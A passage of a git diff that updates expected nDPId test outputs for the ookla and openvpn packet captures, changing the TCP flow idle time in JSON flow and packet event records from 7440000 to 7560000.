-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069108756,"flow_last_seen":1491069108756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069108756,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":5086,"packets-processed":5086,"total-skipped-flows":0,"total-l4-data-len":4349113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1491069155251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5086/5086 diff --git a/test/results/openvpn.pcap.out b/test/results/openvpn.pcap.out index 5bb3aeaee..66753085c 100644 --- a/test/results/openvpn.pcap.out +++ b/test/results/openvpn.pcap.out 
@@ -1,17 +1,17 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"openvpn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467904946700} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467904946700,"flow_last_seen":1467904946700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1467904946700,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467904946700,"flow_last_seen":1467904946700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1467904946700,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":96,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":9094,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1470218591746} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470218591746,"flow_last_seen":1470218591746,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470218591746,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1470218591746,"pkt":"mAyC0zx8AAjKQoXqCABFAABG3rhAAEARTXXAqCsMizuXiaIjNXAAMosJOLAsz\/G18BdPwJFmbjsSS62jkXMxe5OXItH+Y74AAAABV6HBXwAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470218591941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1470218591941,"pkt":"AAjKQoXqmAyC0zx8CABFAABSYIhAADIR2ZmLO5eJwKgrDDVwoiMAPhWBQPd\/wu\/b4j9X3sTI1WVNByO\/jAvlQThWMnDPrhMAAAABV6HBXwEAAAAAsCzP8bXwF08AAAAA"} 
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470218591942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470218591942,"pkt":"mAyC0zx8AAjKQoXqCABFAABO3uZAAEARTT\/AqCsMizuXiaIjNXAAOpZEKLAsz\/G18BdPyDdJemqNaU65YLasCHjnV9mH+DAAAAACV6HBXwEAAAAA93\/C79viP1c="} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1470218600860,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-data-len":19167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1472334890224} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472334890224,"flow_last_seen":1472334890224,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1472334890224,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1472334890224,"pkt":"mAyC0zx8MFLLbJwbCABFAABGe8pAAEARsF3AqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZfF5v2e87DGOeGNd7GPORrKCUl+wAAAABV8IMKgAAAAAA"} diff --git a/test/results/oracle12.pcapng.out b/test/results/oracle12.pcapng.out index 11aef0fe2..32385cd18 100644 --- a/test/results/oracle12.pcapng.out +++ b/test/results/oracle12.pcapng.out 
